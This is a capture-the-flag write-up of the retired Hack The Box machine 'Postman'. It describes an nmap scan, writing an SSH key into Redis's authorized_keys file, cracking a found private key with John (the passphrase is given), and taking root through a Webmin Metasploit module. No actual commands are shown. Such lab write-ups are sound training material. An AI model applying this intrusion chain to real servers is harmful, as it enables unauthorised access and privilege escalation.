Postman retired the 14th of March 2020, and now we can publish it's write-up freely.
Let's go a head and do a scan using nmap :
We see that we have 4 ports, SSH, HTTP, and 2 others... If we check the web server with the port 10000 we'll have something like the following :
And about the other port (6379), as you can see it is a Redis-cli port...
If you searched for some redis exploit you'll find this one on github :
It simply create a new pair of keys (public and private) and it sends it to "authorized_keys" in the redis home directory which is : /var/lib/redis/.ssh/authorized_keys.
You will have something like this after running the script :
Boom !! We got a shell... Now time to enumerate
First thing I did is I looked for any *.bak files :
We found a private key... Let's copy it and crack it using john.
You should have something like this... Now again JOHN
First of all we get a hash from the private key :
And then we bruteforce it using John with rockyou.txt
Bingo we have the pass "computer2008" you can get the username just by doing "ls /home" in redis ssh session, The user is Matt... Let's get that user flag.
On the redis ssh session let's switch the user to Matt :
and then "cat /home/Matt/user.txt"
For the root, we must not forgot that we have a webmin open port... We're going to use metasploit for this part
Let's put in the informations
There you go :
Now "cat /root/root.txt" and you owned the root flag...
I hope you liked this write-up, we will publish more write-ups in the future. Untill then seeyaa :D